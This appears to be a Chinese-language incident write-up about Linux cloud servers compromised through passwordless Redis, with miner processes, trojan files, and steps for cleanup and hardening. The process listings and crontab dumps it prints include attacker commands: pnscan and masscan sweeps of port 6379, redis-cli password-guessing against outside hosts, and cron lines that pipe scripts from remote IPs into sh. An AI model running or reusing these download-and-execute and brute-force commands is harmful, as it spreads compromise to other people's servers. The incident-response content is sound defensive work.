1.中毒特征
有跑满100%CPU的进程notlsb notlsa
[root@ecs-s6-medium-2-linux-20191116090109 ~]# ps aux|grep notlsb
root 9710 0.0 0.0 112712 968 pts/1 S+ 12:20 0:00 grep --color=auto notlsb
root 13009 48.1 0.2 39804 5420 ? Ssl Nov26 1149:03 ./notlsb
杀死后,发现一个pnscan进程,杀不死
[root@ecs-s6-large-2-linux-20191113142903 ~]# ps aux|grep pnscan
root 7471 3.7 0.0 9481936 928 ? Sl 11:50 0:00 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 66 6f 0d 0a 198.234.0.0/16 6379
[root@ecs-s6-medium-2-linux-20191116090109 ~]# ps aux |grep masscan
root 6762 2.5 2.0 201960 38744 ? Sl 12:24 0:00 masscan --max-rate 10000 -p6379 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16
crontab -e
//"/tmp/crontab.F4Macp"
*/15 * * * * curl -fsSL 122.51.164.83:7770/ash.sh|sh
有大量redis-cli进程:
[root@ecs-s6-large-2-linux-20191113142903 redis-4.0.14]# ps -ef |grep redis-cli
root 5751 28428 0 12:13 pts/1 00:00:00 grep --color=auto redis-cli
root 22237 1 0 11:53 ? 00:00:00 redis-cli -h 103.219.179.235 -p 6379 --raw
root 22253 1 0 11:53 ? 00:00:00 redis-cli -h 103.219.179.235 -p 6379 -a 123456 --raw
root 22303 1 0 11:53 ? 00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a oracle --raw
root 22305 1 0 11:53 ? 00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a password --raw
root 22309 1 0 11:53 ? 00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a abc123 --raw
root 22311 1 0 11:53 ? 00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a abc123! --raw
root 22315 1 0 11:53 ? 00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a admin --raw
root 22397 1 0 11:53 ? 00:00:00 redis-cli -h 112.29.172.234 -p 6379 --raw
root 22401 1 0 11:53 ? 00:00:00 redis-cli -h 112.29.172.234 -p 6379 -a root --raw
root 22481 1 0 11:53 ? 00:00:00 redis-cli -h 118.184.159.50 -p 6379 -a root --raw
root 22487 1 0 11:53 ? 00:00:00 redis-cli -h 118.184.159.50 -p 6379 -a p@aaw0rd --raw
root 22491 1 0 11:53 ? 00:00:00 redis-cli -h 118.184.159.50 -p 6379 -a abc123! --raw
root 22493 1 0 11:53 ? 00:00:00 redis-cli -h 118.184.159.50 -p 6379 -a 123456 --raw
root 22597 1 0 11:53 ? 00:00:00 redis-cli -h 134.220.39.193 -p 6379 --raw
root 22599 1 0 11:53 ? 00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a redis --raw
root 22601 1 0 11:53 ? 00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a root --raw
root 22603 1 0 11:53 ? 00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a oracle --raw
root 22605 1 0 11:53 ? 00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a password --raw
root 22607 1 0 11:53 ? 00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a p@aaw0rd --raw
root 22609 1 0 11:53 ? 00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a abc123 --raw
root 22611 1 0 11:53 ? 00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a abc123! --raw
root 22614 1 0 11:53 ? 00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a 123456 --raw
root 22616 1 0 11:53 ? 00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a admin --raw
root 22618 1 0 11:53 ? 00:00:00 redis-cli -h 134.220.78.6 -p 6379 --raw
root 22620 1 0 11:53 ? 00:00:00 redis-cli -h 134.220.78.6 -p 6379 -a redis --raw
root 22622 1 0 11:53 ? 00:00:00 redis-cli -h 134.220.78.6 -p 6379 -a root --raw
root 22624 1 0 11:53 ? 00:00:00 redis-cli -h 134.220.78.6 -p 6379 -a oracle --raw
/bin目录下的异常文件
这几个系统命令被篡改:
计划任务在下载木马:
/tmp下的木马文件
2.原因
通过redis 目前中毒的共同点就是安装了 redis 并且没有设置密码。 有人 利用redis的漏洞。固定在去请求阿里云的内网网ip。找有3306 端口,并且没有设置密码的 ecs。然后植入病毒。
3.解决方法
- 1)删除了 root 用户下面你的所有定时任务。
crontab -u root -r
rm -rf /usr/bin/dpkgd (ps netstat lsof ss)
rm -rf /usr/bin/bsd-port #木马程序
rm -f /usr/bin/.sshd #木马后门
rm -f /tmp/gates.lod
rm -f /tmp/moni.lod
rm -f /etc/rc.d/init.d/DbSecuritySpt(启动上述描述的那些木马变种程序)
rm -f /etc/rc.d/rc1.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc2.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc3.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc4.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc5.d/S97DbSecuritySpt
rm -f /etc/rc.d/init.d/selinux(默认是启动/usr/bin/bsd-port/getty)
rm -f /etc/rc.d/rc1.d/S99selinux
rm -f /etc/rc.d/rc2.d/S99selinux
rm -f /etc/rc.d/rc3.d/S99selinux
rm -f /etc/rc.d/rc4.d/S99selinux
rm -f /etc/rc.d/rc5.d/S99selinux
-
2)不要用 默认端口还不设置密码
在redis.conf 中 requirepass XXX -
3)批量杀死redis-cli进程
ps -ef |grep redis-cli|awk '{print $2}'|xargs kill -9
第一步 top 找到kdevtmpfsi的进程号
第二步 systemctl status 进程号
可以看到 kdevtmpfsi的父进程kinsing,和进程的启动位置路径
ok,把这两个依次kill掉,并且删除它们的源文件
rm -af /var/tmp/kinsing
rm -af /tmp/kdevtmpfsi
用命令 crontab -l 查看定时任务
cd到 /var/spool/cron/ 目录下,查看redis用户
cat redis:
REDIS0009 redis-ver5.0.2
redis-bits㨭eLĪused-mem¨H
preamble~Q
*/1 * * * * curl -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh
cd /var/spool/cron 查看是否有相关的木马定时任务在执行(root文件里面为定时任务)有的话删掉再重启下crontab(命令:systemctl restart crond.service)
后续操作:(找到文件,全部删除,若没有则无需操作
find / -name kdevtmpfsi
find / -name kinsing
4.后续
[root@ecs-s6-large-2-linux-20191113142903 .ssh]# ps -ef|grep sshd
root 2869 1 0 Nov13 ? 00:00:06 /usr/sbin/sshd -D
root 6380 1 0 Nov29 ? 00:00:00 /usr/bin/.sshd
root 10107 2869 0 15:19 ? 00:00:00 sshd: root@pts/6
root 20048 1 0 Dec09 ? 00:00:00 /usr/bin/.sshd
root 22857 2869 0 11:41 ? 00:00:00 sshd: root@pts/3
root 22881 2869 0 11:41 ? 00:00:00 sshd: root@pts/4
root 22996 2869 0 14:18 ? 00:00:00 sshd: root@pts/0
root 23018 2869 0 14:19 ? 00:00:00 sshd: root@pts/1
root 23078 2869 0 14:48 ? 00:00:00 sshd: root@pts/2
root 23080 2869 0 14:48 ? 00:00:00 sshd: root@notty
root 23115 2869 0 14:49 ? 00:00:00 sshd: root@pts/5
root 23117 2869 0 14:49 ? 00:00:00 sshd: root@notty
/tmp下的文件无法删除:
i :设定文件不能被删除、改名、设定链接关系,同时不能写入或新增内容;对目录
[root@ecs-s6-medium-2-linux-20191116090109 tmp]# lsattr *
----i--------e-- config.json
-------------e-- conf.n
-------------e-- notlsb
----i--------e-- sysupdate
----i--------e-- tmp.WhhpNAqNIg/notlsb
----i--------e-- tmp.XZYubjPJK3/notlsa
----i--------e-- wgeta
----i--------e-- wgetb
[root@ecs-s6-medium-2-linux-20191116090109 tmp]# chattr -R -i *
[root@ecs-s6-medium-2-linux-20191116090109 tmp]# lsattr *
-------------e-- conf.n
-------------e-- tmp.WhhpNAqNIg/notlsb
-------------e-- tmp.XZYubjPJK3/notlsa
ls /usr/bin/dpkgd/ #替换的工具,系统自带的工具正常不会在这个目录下,并且也不可用
netstat lsof ps ss
/usr/bin/bsd-port #后门程序
/usr/sbin/.sshd #判断是后门程序
5.华为安全人员的给出的建议
安全排查:
初步判断主机疑似因redis未授权访问漏洞被入侵(漏洞详情可参考链接:http://www.freebuf.com/vuls/85021.html),当前主机内异常文件已暂协助客户清除,为防止黑客留有其他后门,建议客户择机重装系统,重新部署应用,并对参考安全加固建议对主机进行安全加固。
安全加固建议:
1、部署redis建议修改默认端口或者限制IP访问,开启密码认证功能,并使用强密码。
2、启动安全组白名单策略,根据业务需求对外开放端口,关闭不必要开放的端口!对于特殊业务端口,建议设置固定的来源IP(如: 6379、22)或使用VPN、堡垒机建立自己的运维通道;
3、严格控制各服务的系统权限,各服务进程请不要以root权限运行;各应用(如WEB)同数据库交互的账号同样不要使用root权限的账号;
4、设置系统所有账号口令(包括系统账户和应用账户)为符合规范的强口令;
强口令设置要求参照:https://bbs.huaweicloud.com/blogs/87a98385ec6411e79fc57ca23e93a89f
5、建议定期做好数据备份(虚拟机内部备份,异地备份,云上云下备份等),避免被加密勒索;
6、为防御主机和应用方面潜在的安全风险,保护主机不遭受进一步破坏,建议使用华为云官方提供的企业主机安全或安全专家服务:
企业主机安全服务参照:https://www.huaweicloud.com/product/hss.html
安全专家服务参照:https://www.huaweicloud.com/product/ses.html
网友评论